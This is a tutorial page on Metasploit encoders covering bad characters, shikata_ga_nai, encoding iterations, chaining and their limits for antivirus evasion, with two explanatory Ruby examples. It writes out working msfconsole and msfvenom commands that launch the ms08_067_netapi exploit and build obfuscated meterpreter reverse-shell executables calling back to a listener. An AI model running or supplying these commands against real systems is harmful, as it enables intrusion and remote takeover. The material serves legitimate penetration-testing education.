
🔐 Encoders

Encoders transform payload shellcode into a different format. Their primary purpose is to remove bad characters (bytes that would break the exploit delivery mechanism), but they can also provide a basic level of obfuscation against signature-based detection.


1️⃣ Why Encoders Exist

When an exploit delivers a payload through a buffer overflow or protocol injection, certain bytes may cause problems:

| Bad character | Problem |
|---|---|
| \x00 (null byte) | Terminates C strings, so string-copy routines truncate the payload at that byte. |
| \x0a (newline) | Terminates line-based protocol input (e.g., HTTP headers, FTP commands). |
| \x0d (carriage return) | Same as newline in many protocols. |
| \x20 (space) | Can break URL-encoded or command-line payloads. |
| \xff | Problematic in some character set conversions. |

An encoder rewrites the payload so that none of the bad characters appear in the final output. A small decoder stub is prepended that reconstructs the original payload in memory at runtime. The stub is part of the bytes that get delivered, so it must be free of the bad characters as well; Metasploit checks the whole output (stub plus encoded body), not just the body.

Concept

Think of encoding as "packing" the payload. The encoded version avoids bad characters during transit. Once it lands in memory, the decoder stub "unpacks" it back to the original executable shellcode.


2️⃣ Listing Available Encoders

msf6 > show encoders

Encoders
========

   #   Name                      Rank       Description
   -   ----                      ----       -----------
   0   cmd/brace                 low        Bash Brace Expansion Command Encoder
   1   cmd/echo                  good       Echo Command Encoder
   2   generic/eicar             manual     EICAR Test File Encoder
   3   generic/none              normal     The "none" Encoder
   4   mipsbe/byte_xori          normal     Byte XORi Encoder
   5   php/base64                great      PHP Base64 Encoder
   6   x86/shikata_ga_nai        excellent  Polymorphic XOR Additive Feedback Encoder
   7   x86/xor_dynamic           normal     Dynamic key XOR Encoder
   8   x64/xor                   normal     XOR Encoder
   9   x64/xor_dynamic           normal     Dynamic key XOR Encoder
   ...

3️⃣ The Legendary shikata_ga_nai

x86/shikata_ga_nai (Japanese for "nothing can be done about it") is Metasploit's most famous encoder. It uses a polymorphic XOR additive feedback algorithm, meaning:

  • Each encoding produces a different output (polymorphic).
  • The decoder stub itself changes with each encoding.
  • Multiple encoding iterations can be applied to further obfuscate the payload.

Using It in MSFconsole

msf6 > use exploit/windows/smb/ms08_067_netapi
msf6 > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 > set ENCODER x86/shikata_ga_nai
msf6 > set EnableStageEncoding true
msf6 > exploit

ENCODER picks the encoder applied to the stager that goes into the exploit buffer. EnableStageEncoding additionally encodes the larger second stage (Meterpreter itself) that the handler sends once the stager connects back; by default that stage is transmitted unencoded.

Using It with MSFVenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=4444 \
  -e x86/shikata_ga_nai -i 5 \
  -f exe -o payload.exe
  • -e x86/shikata_ga_nai: use the shikata_ga_nai encoder.
  • -i 5: apply 5 encoding iterations. Each iteration re-encodes the previous output, decoder stub included, so the final blob carries five nested stubs.

Note

While shikata_ga_nai was once effective at bypassing antivirus, modern AV/EDR solutions use behavioral analysis and machine learning, not just signatures. Multiple encoding iterations alone are no longer sufficient for evasion against modern security products.
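To make "XOR additive feedback" and "iterations" concrete, here is an added example in Ruby (the language Metasploit's encoder modules are written in). It is not the x86/shikata_ga_nai module: it models only the key stream, emits no decoder stub, and does not randomise instruction or register selection the way the real encoder does. The function names, the DWORD constant, the NOP padding to a 4-byte boundary and the sample bytes are all assumptions of this example.

```ruby
# Added example, not the x86/shikata_ga_nai module itself. It implements the
# XOR additive feedback key stream in plain Ruby so the "additive feedback"
# and "iterations" ideas are visible; it emits no decoder stub and does not
# randomise instruction selection the way the real encoder does.

DWORD = 0xFFFFFFFF

# Encode: each 4-byte block is XORed with the current key, then the key is
# advanced by adding the plaintext block (mod 2^32). Padding to a 4-byte
# boundary with NOPs (0x90) is an assumption of this example; the decoder
# works on whole dwords, so the input must be a multiple of four bytes.
def feedback_encode(payload, key)
  padded = payload + ("\x90".b * ((-payload.bytesize) % 4))
  out = ''.b
  padded.unpack('V*').each do |plain|
    out << [plain ^ key].pack('V')
    key = (key + plain) & DWORD
  end
  out
end

# Decode mirrors the stub's loop: xor [ptr], key ; add key, [ptr] ; next.
# After the XOR the block in memory is plaintext, so the feedback is taken
# from the decoded value, exactly as in the encoder.
def feedback_decode(encoded, key)
  out = ''.b
  encoded.unpack('V*').each do |cipher|
    plain = cipher ^ key
    out << [plain].pack('V')
    key = (key + plain) & DWORD
  end
  out
end

# Apply the encoder +iterations+ times (what msfvenom -i N does), each round
# with a fresh random key. Returns the final blob and the keys needed to unwind.
def encode_iterations(payload, iterations, rng = Random.new)
  keys = []
  blob = payload
  iterations.times do
    key = rng.rand(1..DWORD)
    keys << key
    blob = feedback_encode(blob, key)
  end
  [blob, keys]
end

# Unwind in reverse: the outermost (last applied) layer is decoded first,
# just as the outermost stub runs first on the target.
def decode_iterations(blob, keys)
  keys.reverse.reduce(blob) { |acc, key| feedback_decode(acc, key) }
end

if __FILE__ == $PROGRAM_NAME
  sample = "\x31\xc0\x50\x68\x01\x00\x00\x00".b # constructed sample bytes
  a = feedback_encode(sample, 0x11223344)
  b = feedback_encode(sample, 0x55667788)
  puts "same input, two keys, different output: #{a != b}"
  blob, keys = encode_iterations(sample, 5)
  puts "5 iterations, keys: #{keys.map { |k| format('%08x', k) }.join(' ')}"
  puts "unwound to original: #{decode_iterations(blob, keys) == sample}"
end
```

Two points the code makes visible: because the key is updated with each decoded block, flipping one byte of the input changes every following output block (a single-key XOR would only change that byte), and a random initial key already yields a different output per run before any stub randomisation is added.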


4️⃣ Specifying Bad Characters

When generating payloads, you can tell the encoder which bytes to avoid:

# Avoid null bytes and newlines
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=4444 \
  -b '\x00\x0a\x0d' \
  -f exe -o payload.exe

When no encoder is named, msfvenom works through the compatible encoders from the highest rank down and keeps the first whose output contains none of the listed bytes. If every encoder fails it stops with an error rather than emitting a payload that still contains bad characters, so a failed run means the set must be loosened or a different payload chosen, not that the output can be shipped anyway.

Exploit modules normally carry their own bad-character list in their metadata, and that list is applied automatically when the module generates its payload.

# Within MSFconsole
set BadChars "\x00\x0a\x0d\x20"
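The key search from "Why Encoders Exist" and the rank-ordered encoder selection described in this section, as an added Ruby example (Ruby because Metasploit's encoders are Ruby modules). This is not Metasploit's code: the single-byte XOR encoder, the demo/ encoder names, the RANKS list and the sample payload are constructed for the example, and the selection loop only models msfvenom's behaviour of trying the highest-ranked compatible encoder first and falling through on failure.

```ruby
# Added example, not Metasploit's own code. It models two things this page
# describes: an encoder that searches for a key whose output contains none
# of the bad characters, and msfvenom's habit of trying compatible encoders
# from the highest rank down, falling through when one cannot satisfy them.

# Constructed sample "shellcode": it deliberately contains a null byte, a
# newline, and bytes chosen so that every XOR key below 0x10 fails.
SAMPLE_PAYLOAD = "\x31\xc0\x50\x68\x00\x0a\x0b\x0c\x01\x02\x03\x0e\x0f\x89\xe3".b.freeze

# Bad characters that actually occur in +bytes+ (empty array when clean).
def find_bad_chars(bytes, badchars)
  bad = badchars.bytes
  bytes.bytes.uniq.select { |b| bad.include?(b) }
end

# Single-byte XOR encoder. The key is embedded in the decoder stub, so it may
# not be a bad character itself, and every output byte must be clean too.
# Returns [key, encoded] or nil when no key satisfies the bad-character set.
def xor_encode(payload, badchars)
  bad = badchars.bytes
  (1..255).each do |key|
    next if bad.include?(key)
    encoded = payload.bytes.map { |b| b ^ key }.pack('C*')
    return [key, encoded] if find_bad_chars(encoded, badchars).empty?
  end
  nil
end

# What the decoder stub does at runtime: XOR each byte back with the key.
def xor_decode(key, encoded)
  encoded.bytes.map { |b| b ^ key }.pack('C*')
end

# Metasploit's module ranks, lowest to highest.
RANKS = %w[manual low average normal good great excellent].freeze

# Hypothetical encoder table (the demo/ names are made up for this example).
# Each :encode lambda returns [key, encoded] or nil on failure; the "none"
# encoder only succeeds when the raw payload is already clean.
ENCODERS = [
  { name: 'demo/none', rank: 'normal',
    encode: ->(p, bad) { find_bad_chars(p, bad).empty? ? [nil, p] : nil } },
  { name: 'demo/xor_byte', rank: 'good',
    encode: ->(p, bad) { xor_encode(p, bad) } }
].freeze

# Try encoders highest rank first, skipping 'manual' ones, and return the
# first clean result as [name, key, encoded]; nil when every encoder fails.
def select_encoder(payload, badchars, encoders = ENCODERS)
  ordered = encoders.reject { |e| e[:rank] == 'manual' }
                    .sort_by { |e| -RANKS.index(e[:rank]) }
  ordered.each do |enc|
    result = enc[:encode].call(payload, badchars)
    return [enc[:name], *result] if result
  end
  nil
end

if __FILE__ == $PROGRAM_NAME
  bad = "\x00\x0a\x0d".b
  hex = ->(bytes) { bytes.map { |b| format('\\x%02x', b) }.join }
  puts "bad chars in raw payload: #{hex.call(find_bad_chars(SAMPLE_PAYLOAD, bad))}"
  name, key, encoded = select_encoder(SAMPLE_PAYLOAD, bad)
  puts "selected #{name}, key #{key.nil? ? 'none' : format('0x%02x', key)}"
  puts "encoded:  #{hex.call(encoded.bytes)}"
  puts "decoded matches original: #{xor_decode(key, encoded) == SAMPLE_PAYLOAD}"
end
```

The failure mode worth noticing is the nil return: a payload that contains every byte value cannot be single-byte-XORed around a \x00 bad character at all, because whatever key is chosen some input byte equals it and produces a null. That is the situation in which msfvenom reports that no encoder succeeded, and the fix is a different encoder family or a smaller bad-character set, not more iterations.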

5️⃣ Common Encoders

| Encoder | Rank | Platform | Use Case |
|---|---|---|---|
| x86/shikata_ga_nai | Excellent | x86 Windows/Linux | Best general-purpose x86 encoder. Polymorphic. |
| x64/xor | Normal | x64 | Simple XOR for 64-bit payloads. |
| x64/xor_dynamic | Normal | x64 | Dynamic key XOR; slightly better obfuscation. |
| php/base64 | Great | PHP | Encodes PHP payloads in base64. |
| cmd/powershell_base64 | Excellent | Windows | Base64-encodes PowerShell commands. |
| generic/none | Normal | Any | No encoding; useful for debugging. |

6️⃣ Multi-Encoding (Chaining Encoders)

You can apply multiple encoders in sequence for deeper obfuscation:

# Using MSFVenom with multiple encoders: the first run emits raw encoded
# shellcode, the second reads it from STDIN as a custom payload (-p -).
# A custom payload carries no metadata, so -a and --platform are required.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=4444 \
  -e x86/shikata_ga_nai -i 3 \
  -f raw | \
msfvenom -p - -e x86/xor_dynamic -i 2 \
  -a x86 --platform windows \
  -f exe -o multi_encoded.exe

Tip

Multi-encoding increases payload size and can introduce instability. Test thoroughly in a lab environment before using multi-encoded payloads in an engagement.


7️⃣ Gotchas

Note

Encoders ≠ evasion. Encoding a payload does NOT guarantee it will bypass antivirus. Modern AV/EDR products detect encoded payloads through behavioral analysis, memory scanning, and heuristic analysis — not just static signatures. Use the dedicated evasion/ modules or custom techniques for real evasion (see Firewall & IDS/IPS Evasion).

Note

Architecture matters. x86/shikata_ga_nai only works with x86 payloads. For x64 payloads, use x64/xor or x64/xor_dynamic.

Note

Size increase. Each encoding iteration prepends another decoder stub and therefore grows the payload. If the exploit has a limited buffer size, too many iterations may push the payload past the available space. Exploit modules enforce their declared Space limit when they generate the payload, and msfvenom's -s <bytes> option makes it fail rather than silently produce an oversized file.


Warning

Encoded payloads are still payloads. Ensure you have authorization before generating or delivering them to any target system.